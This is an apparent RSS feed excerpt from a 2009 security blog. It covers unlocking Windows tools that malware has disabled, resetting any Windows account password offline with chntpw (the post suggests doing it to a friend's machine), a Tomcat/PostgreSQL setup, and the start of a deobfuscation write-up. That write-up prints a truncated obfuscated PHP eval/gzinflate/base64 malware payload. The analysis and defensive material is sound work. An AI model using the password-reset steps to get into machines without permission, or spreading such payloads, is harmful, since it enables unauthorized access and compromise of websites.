<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bughira.wordpress.com/380/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bughira.wordpress.com/380/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bughira.wordpress.com/380/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bughira.wordpress.com/380/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bughira.wordpress.com/380/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bughira.wordpress.com/380/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bughira.wordpress.com/380/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bughira.wordpress.com/380/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bughira.wordpress.com/380/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bughira.wordpress.com/380/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bughira.wordpress.com/380/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bughira.wordpress.com/380/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bughira.wordpress.com/380/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bughira.wordpress.com/380/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=380&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bughira.wordpress.com/2009/08/03/videojak-now-hijaking-ip-video-surveillance-camera/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/66d6f3751ae21240285913c9b962f9a4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">bughira</media:title>
		</media:content>
	</item>
		<item>
		<title>Unlock Registry Editor, Task Manager and Folder Options</title>
		<link>http://bughira.wordpress.com/2009/07/10/unlock-registry-editor-task-manager-and-folder-options/</link>
		<comments>http://bughira.wordpress.com/2009/07/10/unlock-registry-editor-task-manager-and-folder-options/#comments</comments>
		<pubDate>Fri, 10 Jul 2009 12:53:36 +0000</pubDate>
		<dc:creator>bughira</dc:creator>
				<category><![CDATA[HOWTO's]]></category>
		<category><![CDATA[Information Security]]></category>
		<category><![CDATA[Malware Techniques]]></category>
		<category><![CDATA[folder options]]></category>
		<category><![CDATA[task manager]]></category>
		<category><![CDATA[unlock registry]]></category>

		<guid isPermaLink="false">http://bughira.wordpress.com/?p=369</guid>
		<description><![CDATA[Many of the computer users have the habit to download and use online games or check out latest screen savers. Most of them use torrents to download such softwares or movies. This habit could lead to locking yourself out of using tools like registry editor or process viewer. Let me ask you some questions. Have [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=369&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="padding-left:30px;">Many of the computer users have the habit to download and use online games or check out latest screen savers. Most of them use torrents to download such softwares or movies. This habit could lead to locking yourself out of using tools like registry editor or process viewer. Let me ask you some questions.</p>
<ul style="padding-left:30px;">
<li>Have you ever downloaded random software from the internet and realized your Registry is locked after installing them?</li>
<li>Have you ever experienced inspite of hitting Ctrl+Alt+Del, Task Manager never showed up?</li>
<li>Have you ever tried to change the folder properties and found Folder options are locked?</li>
</ul>
<p style="padding-left:30px;">If answer to any of above questions is <strong>&#8216;Yes&#8217;</strong>, then you are probably infected by some Virus/Spyware/Bot. Disabling Registry Editing Tools, Task Managers and Folder Options are the preliminary things usually done by such viruses or Spywares. This post will show you two manual methods of unlocking your Registry Editor, Task Manager and Folder Options.</p>
<h2 style="padding-left:30px;">I) Using Group Policy Editor</h2>
<p style="padding-left:30px;">Group policy editor is a feature of Microsoft NT Family for centralized management of Computers, Users and Softwares. It can be launched by typing &#8220;<em>gpedit.msc</em>&#8221; in Run textbox.</p>
<h3 style="padding-left:60px;">Unlock Registry:</h3>
<ol style="padding-left:30px;">
<li>Open Group Policy Editor</li>
<li>Navigate to <em>User Configuration-&gt;Administrative Template-&gt;System</em></li>
<li>Double Click on &#8220;<em>Prevent access to registry editing tools</em>&#8221; and Click Disable.</li>
</ol>
<h3 style="padding-left:60px;">Unlock TaskManager:</h3>
<ol style="padding-left:30px;">
<li>Open Group Policy Editor</li>
<li>Navigate to <em>User Configuration-&gt;Administrative Template-&gt;System-&gt;Ctrl+Alt+Delete Options</em></li>
<li>Double Click on &#8220;<em>Remove task manager</em>&#8221; and Click Disable.</li>
</ol>
<h3 style="padding-left:60px;">Folder Options:</h3>
<ol>
<li>Open Group Policy Editor</li>
<li>Navigate to <em>User Configuration-&gt;Administrative Templates-&gt;Windows Component-&gt;Windows Explorer</em></li>
<li>Double Click on &#8220;<em>Removes the Folder Options menu item from the Tools menu</em>&#8220;  and Click Disable.</li>
</ol>
<p>Above mentioned steps are the easy way to achieve the task. Now let&#8217;s see what goes under the hood when you Disable some policy from Group Policy Editor.</p>
<h2>II) Using reg.exe</h2>
<p style="padding-left:30px;">Reg.exe is the Console Registry Tool provided for trouble shooting registry issues. Just open command prompt and type &#8220;reg&#8221; to list all supported options.</p>
<h3 style="padding-left:60px;">Unlock Registry:</h3>
<ol>
<li>Navigate to <em>Start-&gt;Run</em> and Type following command</li>
<li>
<pre>REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0</pre>
</li>
<li>This will prompt a console windows asking &#8220;<em>Value DisableRegistryTools exists, overwrite(Y/N)?</em>&#8220;</li>
<li>Say &#8220;Y&#8221; to overwrite current value in the registry key.</li>
<li>Repeat steps 1-3-4 for following command.</li>
<li>
<pre>REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0</pre>
</li>
</ol>
<h3 style="padding-left:60px;">Unlock Task Manager:</h3>
<ol>
<li>Navigate to <em>Start-&gt;Run</em> and Type following command</li>
<li>
<pre>REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0</pre>
</li>
<li>This will prompt a console windows asking &#8220;<em>Value DisableTaskMgr exists, overwrite(Y/N)?</em>&#8220;</li>
<li>Say &#8220;Y&#8221; to overwrite current value in the registry key.</li>
<li>Repeat steps 2-3 for following command.</li>
<li>
<pre>REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0</pre>
</li>
</ol>
<h3 style="padding-left:60px;">Folder Options:</h3>
<ol>
<li>Navigate to <em>Start-&gt;Run</em> and Type following command</li>
<li>
<pre>REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NofolderOptions /t REG_DWORD /d 0</pre>
</li>
<li>This will prompt a console windows asking &#8220;<em>Value NoFolderOptions exists, overwrite(Y/N)?</em>&#8220;</li>
<li>Say &#8220;Y&#8221; to overwrite current value in the registry key.</li>
<li>Repeat steps 2-3 for following command.</li>
<li>
<pre>REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NofolderOptions /t REG_DWORD /d 0</pre>
</li>
</ol>
<h3 style="text-align:center;">Don&#8217;t forget to reboot the system after making above changes in registry.</h3>
<p>Now you can have same access to your Registry, Task Manager and Folder options. From now onwards be careful before downloading and Installing random softwares from internet.</p>
<p><strong>Enjoy and Stay Safe!!!</strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bughira.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bughira.wordpress.com/369/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bughira.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bughira.wordpress.com/369/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bughira.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bughira.wordpress.com/369/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bughira.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bughira.wordpress.com/369/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bughira.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bughira.wordpress.com/369/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bughira.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bughira.wordpress.com/369/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bughira.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bughira.wordpress.com/369/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=369&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bughira.wordpress.com/2009/07/10/unlock-registry-editor-task-manager-and-folder-options/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/66d6f3751ae21240285913c9b962f9a4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">bughira</media:title>
		</media:content>
	</item>
		<item>
		<title>Reset Administrator Password of WinXP/Vista</title>
		<link>http://bughira.wordpress.com/2009/06/16/reset-administrator-password-of-winxpvista/</link>
		<comments>http://bughira.wordpress.com/2009/06/16/reset-administrator-password-of-winxpvista/#comments</comments>
		<pubDate>Tue, 16 Jun 2009 09:09:40 +0000</pubDate>
		<dc:creator>bughira</dc:creator>
				<category><![CDATA[HOWTO's]]></category>
		<category><![CDATA[Information Security]]></category>
		<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[chntpw]]></category>
		<category><![CDATA[reset windows XP password]]></category>
		<category><![CDATA[Widows password crack]]></category>

		<guid isPermaLink="false">http://bughira.wordpress.com/?p=358</guid>
		<description><![CDATA[This post will show you how to use chntpw utility to reset password of any windows XP/VISTA user account.<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=358&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Have you ever forgot your WindowsXP or Vista&#8217;s Administrator password? Have you ever re-installed your XP just because you forgot your admin password and didn&#8217;t know how to reset it? Do you want to reset your friends Administrator password?</p>
<p>If your answer for any of the above question is &#8216;yes&#8217; then this is the right place for you to get help. In this post i will explain simple way to reset password of any user account using a linux live CD. I will be explaining the password resetting procedure using Ubuntu live cd. Its not mandatory to use live cd, same steps can be used if you have duel boot linux partition.</p>
<h2>Prerequisites:</h2>
<ul>
<li>Ubuntu Live CD</li>
<li>CD-ROM should be the first option in the target computers bios boot sequence.</li>
</ul>
<p>OK  if you have met above mentioned pre-requisites, lets get started. We will be using a small NT password recover utility <strong>chntpw</strong> ( change NT password ). chntpw contains a simple registry editor which allows us to change bits and bytes.</p>
<p>Default ISO of Ubuntu-9.04 does not contain chntpw utility. We need to explicitly install it using either of following way.</p>
<ul>
<li>
<pre>$ sudo apt-get install chntpw</pre>
</li>
<li>Manual: If repository do not find the package.</li>
</ul>
<p>We need to manually satisfy dependencies for chntpw utility by using</p>
<pre>Bughira# apt-get install libgcrypt11</pre>
<p>Now download debian package of chntpw utility from <a title="Download chntpw" href="http://packages.ubuntu.com/jaunty/i386/chntpw/download" target="_blank">here</a> and install it using</p>
<pre>Bughira:~# dpkg -i chntpw_0.99.5-0+nmu1_i386.deb
Selecting previously deselected package chntpw.
(Reading database ... 129568 files and directories currently installed.)
Unpacking chntpw (from .../chntpw_0.99.5-0+nmu1_i386.deb) ...
Setting up chntpw (0.99.5-0+nmu1) ...
Processing triggers for man-db ...
Bughira:~#</pre>
<h2>Resetting the password:</h2>
<ul>
<li>Mount the windows partition</li>
<li>Change the current directory to <strong>WINDOWS\system32\config</strong></li>
<li>
<pre>Bughira# chntpw -l SAM  (this will list all the configured users on the target system)</pre>
</li>
</ul>
<pre>* SAM policy limits:
Failed logins before lockout is: 0
Minimum password length        : 0
Password history count         : 0
| RID -|---------- Username ------------| Admin? |- Lock? --|
| 03eb | admin                          | ADMIN  | dis/lock |
| 01f4 | Administrator                  | ADMIN  | dis/lock |
| 03ed | ASPNET                         |        |          |
| 01f5 | Guest                          |        | dis/lock |
| 03e8 | HelpAssistant                  |        | dis/lock |
| 03ea | SUPPORT_388945a0               |        | dis/lock |</pre>
<ul>
<li>
<pre>Bughira# chntpw -u Administrator SAM</pre>
</li>
</ul>
<ul>
<li>If we do not specify any user account then Administrator user account it selected and following menu is presented</li>
</ul>
<pre>- - - - User Edit Menu:
 1 - Clear (blank) user password
 2 - Edit (set new) user password (careful with this on XP or Vista)
 3 - Promote user (make user an administrator)
 4 - Unlock and enable user account [probably locked now]
 q - Quit editing user, back to user select</pre>
<p>Enter &#8217;1&#8242; as choice to clear the password and you are done. We can even change the password or promote another user as an administrator of the system.</p>
<pre>Select: [q] &gt; 1
Password cleared!

Hives that have changed:
 #  Name
 0  &lt;/media/disk/WINDOWS/system32/config/SAM&gt;
Write hive files? (y/n) [n] : y
 0  &lt;/media/disk/WINDOWS/system32/config/SAM&gt; - OK</pre>
<p>Now you can reboot the system and happily login in your crapy windows box <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Enjoy!!</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bughira.wordpress.com/358/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bughira.wordpress.com/358/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bughira.wordpress.com/358/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bughira.wordpress.com/358/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bughira.wordpress.com/358/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bughira.wordpress.com/358/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bughira.wordpress.com/358/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bughira.wordpress.com/358/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bughira.wordpress.com/358/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bughira.wordpress.com/358/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bughira.wordpress.com/358/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bughira.wordpress.com/358/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bughira.wordpress.com/358/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bughira.wordpress.com/358/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=358&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bughira.wordpress.com/2009/06/16/reset-administrator-password-of-winxpvista/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/66d6f3751ae21240285913c9b962f9a4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">bughira</media:title>
		</media:content>
	</item>
		<item>
		<title>Deploying Apache-Tomcat Postgresql Web Applications on Ubuntu 9.04</title>
		<link>http://bughira.wordpress.com/2009/05/27/deploying-apache-tomcat-postgresql-web-applications-on-ubuntu-9-04/</link>
		<comments>http://bughira.wordpress.com/2009/05/27/deploying-apache-tomcat-postgresql-web-applications-on-ubuntu-9-04/#comments</comments>
		<pubDate>Wed, 27 May 2009 16:38:56 +0000</pubDate>
		<dc:creator>bughira</dc:creator>
				<category><![CDATA[General Talks]]></category>
		<category><![CDATA[HOWTO's]]></category>
		<category><![CDATA[apache-tomcat installation]]></category>
		<category><![CDATA[configure postgresql]]></category>
		<category><![CDATA[deploy web application]]></category>
		<category><![CDATA[postgresql installation]]></category>
		<category><![CDATA[tomcat installation on ubuntu]]></category>
		<category><![CDATA[ubuntu 9.04]]></category>

		<guid isPermaLink="false">http://bughira.wordpress.com/?p=351</guid>
		<description><![CDATA[This post includes HowTo:
   1. Install Apache-Tomcat 6.x.x
   2. Install Postgresql-8.7.3
   3. Make them communicate with each other.
On ubuntu 9.04 
<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=351&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hmm this seems like easy task to do right? but believe me sometimes this simple job gives you real pain in ass while deploying some web applications.<br />
I decided to write this blog post as a reference material for newbies. Following steps are tested and works perfect on Ubuntu 9.04</p>
<p><strong>This post includes HowTo:</strong></p>
<ol>
<li> Install Apache-Tomcat 6.x.x</li>
<li> Install Postgresql</li>
<li> Make them communicate with each other.</li>
</ol>
<p>Lets first get started with the Apache-Tomcat Installation. Before we proceed lets make sure if we have JDK installed or not.</p>
<pre>$dpkg –-get-selections | grep sun-java</pre>
<p>Above command should yield output similar to following</p>
<pre>sun-java6-bin                                   install
sun-java6-jdk                                   install
sun-java6-jre                                   install</pre>
<p>If output yields no result, you&#8217;ll need to install sun-java using following command</p>
<pre>$ sudo apt-get install sun-java6-jdk</pre>
<p>I ran into problems while using Tomcat versions from repositories, so here we will download the Tomcat from <a title="Official Apache Tomcat Website" href="http://tomcat.apache.org/" target="_blank">official Apache site</a>.</p>
<pre>wget http://mirror.jimbojay.com/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz</pre>
<p>Extract the tarball and move it to some permanent location like /usr/local/</p>
<pre>mv apache-tomcat-6.0.18 /usr/local/apache-tomcat-6.0.18</pre>
<p><strong>JAVA_HOME</strong> Variable is needed for tomcat to work properly so we need to export it.</p>
<pre>export JAVA_HOME=/usr/lib/jvm/java-6-sun</pre>
<p>This variable will get unset once you logoff and to set this variable permanently, you will need to edit <strong>~/.bashrc </strong>file.<br />
Open it in your favorite editor and put following line at the end of file.</p>
<pre>export JAVA_HOME=/usr/lib/jvm/java-6-sun</pre>
<p>save the file and you are done.<br />
Once variable is set, we are now ready to start the tomcat server by executing <strong>/usr/local/apache-tomcat-6.0.18/bin/startup.sh</strong> script.</p>
<pre>root@bughira:~# /usr/local/apache-tomcat-6.0.18/bin/startup.sh
Using CATALINA_BASE:   /usr/local/apache-tomcat-6.0.18
Using CATALINA_HOME:   /usr/local/apache-tomcat-6.0.18
Using CATALINA_TMPDIR: /usr/local/apache-tomcat-6.0.18/temp
Using JRE_HOME:       /usr/lib/jvm/java-6-sun</pre>
<p>Lets quickly check if we can see the apache process in memory.</p>
<pre>root@bughira:~# ps -ef | grep apache
root      3089     1 45 23:56 pts/0    00:00:01 /usr/lib/jvm/java-6-sun/bin/java -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.util.logging.config.file=/usr/local/apache-tomcat-6.0.18/conf/logging.properties -Djava.endorsed.dirs=/usr/local/apache-tomcat-6.0.18/endorsed -classpath :/usr/local/apache-tomcat-6.0.18/bin/bootstrap.jar -Dcatalina.base=/usr/local/apache-tomcat-6.0.18 -Dcatalina.home=/usr/local/apache-tomcat-6.0.18 -Djava.io.tmpdir=/usr/local/apache-tomcat-6.0.18/temp org.apache.catalina.startup.Bootstrap start
root      3100  3068  0 23:56 pts/0    00:00:00 grep apache
root@bughira:~#</pre>
<p>yes indeed and we can confirm that apache is running on default TCP port 8080</p>
<p>We can also write init control script for starting/stopping or restarting tomcat. Just copy and paste following shell script and save it as tomcat-ctl.sh</p>
<pre> #!/bin/bash
 #
 # Tomcat-ctl to start/stop/restart apache-tomcat server.
 #
 export JAVA_HOME=/usr/lib/jvm/java-6-sun

 case $1 in
 start)
 sh /usr/local/tomcat/bin/startup.sh
 ;;
 stop)  
 sh /usr/local/tomcat/bin/shutdown.sh
 ;;
 restart)
 sh /usr/local/tomcat/bin/shutdown.sh
 sh /usr/local/tomcat/bin/startup.sh
 ;;
 esac   
 exit 0</pre>
<p>Now lets install and configure postgresql server. Again we will be using pure postgresql server from its <a title="Official Postgresql website" href="http://www.postgresql.org/" target="_blank">official website.</a><br />
The latest version available at the time of writing this post was 8.3.7 so lets Download the tarball  and untar it.</p>
<pre>$wget http://wwwmaster.postgresql.org/download/mirrors-ftp/source/v8.3.7/postgresql-8.3.7.tar.gz
$tar zxvf postgresql-8.3.7.tar
$cd postgresql-8.3.7</pre>
<p>Decide the permanent location for the postgresql and use it in &#8211;prefix parameter of configuration script as follows.</p>
<pre>$./configure --prefix=/usr/local/pgsql</pre>
<p>Compile postgresql</p>
<pre>$make</pre>
<p>and now install it to put necessary libraries and binaries in place.</p>
<pre>$sudo make install</pre>
<p>It is recommended to create a separate user to own the PostgreSQL files and processes that will be installed. Typically user &#8216;postgres&#8217; is created for this purpose.<br />
By default, POSTGRESQL allows database access only to users logged into the computer running the database server.</p>
<pre>$sudo useradd postgres
$sudo mkdir /usr/local/pgsql/data
$sudo chown postgres /usr/local/pgsql/data</pre>
<p>Lets initialize the postgres sever</p>
<pre>$su - postgres -c "/usr/local/pgsql/bin/initdb -D /usr/local/pgsql/data"</pre>
<p>Once initialization if successful; we can start the server using following command.</p>
<pre>$su - postgres -c "/usr/local/pgsql/bin/postmaster -D /usr/local/pgsql/data &gt;logfile 2&gt;&amp;1 &amp;"</pre>
<p>Lest test our server by creating a test database and connecting to it.</p>
<pre>$su - postgres -c "/usr/local/pgsql/bin/createdb testdb"
$su - postgres -c "/usr/local/pgsql/bin/psql testdb"
$su - postgres -c "/usr/local/pgsql/bin/psql testdb"</pre>
<p>Above command if successful should yield following output</p>
<pre>Welcome to psql 8.3.7, the PostgreSQL interactive terminal.
Type:  \copyright for distribution terms
 \h for help with SQL commands
 \? for help with psql commands
 \g or terminate with semicolon to execute query
 \q to quit
testdb=#</pre>
<p>If you are able to log in successfully and get psql common prompt, we have successfully installed postgresql server.<br />
Now its time to configure server to accept remote connections &#8211; unless you only want to access the database on the local machine. To do this, first, we need to edit the postgresql.conf file:</p>
<pre>$ sudo vi /etc/postgresql/8.3/main/postgresql.conf</pre>
<p>Now, to edit a couple of lines in the <strong>‘Connections and Authentication’</strong> section…<br />
Change the line:</p>
<pre>#listen_addresses = 'localhost'</pre>
<p>to</p>
<pre>listen_addresses = '*'</pre>
<p>and</p>
<pre>#password_encryption = on</pre>
<p>to</p>
<pre>password_encryption = on</pre>
<p>Save the file and you are done.<br />
We also must define who can access the server. This is all done using the pg_hba.conf file.</p>
<pre>$ sudo vi /etc/postgresql/8.3/main/pg_hba.conf</pre>
<p>Comment out, or delete the current contents of the file, then add this text to the bottom of the file:</p>
<pre># DO NOT DISABLE!
# If you change this first entry you will need to make sure that the
# database
# super user can access the database using some other method.
# Noninteractive
# access to all databases is required during automatic maintenance
# (autovacuum, daily cronjob, replication, and similar tasks).
#
# Database administrative login by UNIX sockets
local   all         postgres                          ident sameuser
# TYPE  DATABASE    USER        CIDR-ADDRESS          METHOD
# "local" is for Unix domain socket connections only
local   all         all                               md5
# IPv4 local connections:
host    all         all         127.0.0.1/32          md5
# IPv6 local connections:
host    all         all         ::1/128               md5
# For remote PC connections
host    all        all          0.0.0.0/0             md5</pre>
<p>The last line says allow all computers to connect to all database with any username.<br />
Above procedure and configuration will help normal users to connect and operate on our installed Postgresql server but how will tomcat connect it?<br />
JDBC driver is needed for apache-tomcat to make connections with Postgresql server. Download the valid JDBC driver(jar file) from <a title="Download JDBC Driver" href="http://jdbc.postgresql.org/download.html" target="_blank">postgreql site</a> and copy it under lib folder of tomcat.</p>
<p>In our case download and copy postgresql-8.3-604.jdbc4.jar under <strong>/usr/local/apache-tomcat-6.0.18/lib/</strong> directory and restart the tomcat server using our script.</p>
<pre>$ sudo cp postgresql-8.3-604.jdbc4.jar /usr/local/apache-tomcat-6.0.18/lib/
$ sudo tomcat-ctl restart</pre>
<p>Now your tomcat-postgresql connectivity should be working. I hope you find this post useful.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bughira.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bughira.wordpress.com/351/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bughira.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bughira.wordpress.com/351/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bughira.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bughira.wordpress.com/351/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bughira.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bughira.wordpress.com/351/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bughira.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bughira.wordpress.com/351/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bughira.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bughira.wordpress.com/351/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bughira.wordpress.com/351/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bughira.wordpress.com/351/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=351&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bughira.wordpress.com/2009/05/27/deploying-apache-tomcat-postgresql-web-applications-on-ubuntu-9-04/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/66d6f3751ae21240285913c9b962f9a4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">bughira</media:title>
		</media:content>
	</item>
		<item>
		<title>Decode: eval_gzinflate_base64_decode</title>
		<link>http://bughira.wordpress.com/2009/05/12/decode-eval_gzinflate_base64_decode/</link>
		<comments>http://bughira.wordpress.com/2009/05/12/decode-eval_gzinflate_base64_decode/#comments</comments>
		<pubDate>Tue, 12 May 2009 12:44:25 +0000</pubDate>
		<dc:creator>bughira</dc:creator>
				<category><![CDATA[HOWTO's]]></category>
		<category><![CDATA[Information Security]]></category>
		<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Malware Techniques]]></category>
		<category><![CDATA[Reverse Engineering]]></category>
		<category><![CDATA[Web Security]]></category>
		<category><![CDATA[eval gzinflate base64]]></category>
		<category><![CDATA[php decode]]></category>
		<category><![CDATA[web sec]]></category>

		<guid isPermaLink="false">http://bughira.wordpress.com/?p=341</guid>
		<description><![CDATA[If you follow my posts&#8230;.sometime back i wrote about the my encounter with web attacks which was amazing experience. I am lazy kinda person and with all this IPL fever these days, I don&#8217;t even think of blogging or doing personal research. So what made me sit and write today? The answer is,&#160; my same [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bughira.wordpress.com&amp;blog=3478846&amp;post=341&amp;subd=bughira&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>If you follow my posts&#8230;.sometime back i wrote about the <a title="Encounter with Live Web Attack" href="http://bughira.wordpress.com/2009/02/15/my-encounter-with-live-web-attack/" target="_blank">my encounter with web attacks</a> which was amazing experience. I am lazy kinda person and with all this <a title="Indian Premier League" href="http://www.iplt20.com" target="_blank">IPL</a> fever these days, I don&#8217;t even think of blogging or doing personal research.</p>
<p>So what made me sit and write today?</p>
<p>The answer is,&nbsp; my same old friend pinged me for help in one of his old web site maintenance project.&nbsp; They found the website is making suspicious outbound connections and customers are receiving some junk emails from the domain. My friend was assigned to look into the issue. He asked for my help and i decided to jump inn to get dirty&#8230;</p>
<p>I asked him to get me all the suspicious looking files from the hosted web server for analysis and within few minutes he sent me some php files.</p>
<p>PHP file was filled with totally junk characters similar to following</p>
<pre>eval(gzinflate(base64_decode('7b37QhtH8ij8P0/RniiLFEtCYOeGDA4GHHOCjRfwZnMwRxlpRjCLpFFmRmCv1+d9vmc4L/fVpa9zkQS2c9mfnV1b05fq6u7q6urq6qrauBPv9S4fDn4KJ4Ot1a/+z5c64cv/89Vq9/H2yqPHNbvQxtbq/71X1ymNe/9XlXr+didJ/Le9kyyJJhe9n8K36ZZPKVfws17rHe///dX+yWmjO4wTUYfyh3E8PZhk4UWYbHW6bsKjrUE8m2RWtdZ6rsj9+413OvusrP0zt8L5+VaaJb0knI78QVh3+tX01rzmLaE1uh+t+Y2m175D+++XHPof92897FilYsg ( cut for brevity)</pre>
<p>Looking at the code, I realize this routine is definitely having malicious code. This was my first experience with php based de-obfuscation. I googled it a bit and got pointer to some php code used for decoding this gzinflate() routine. I download that file and realize not having&nbsp; php-cli/php-cgi installed on my office debian box.</p>
<p>I quickly did <i>&#8220;apt-get install php5-cli&#8221;</i> and started PHP installation. In the meanwhile, I decided to apply java-script de-obfuscation knowledge and some common sense on this problem <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>In JavaScript, we used use replace eval() with document.write() and in stead of running the code we used display decoded script using alert().</p>
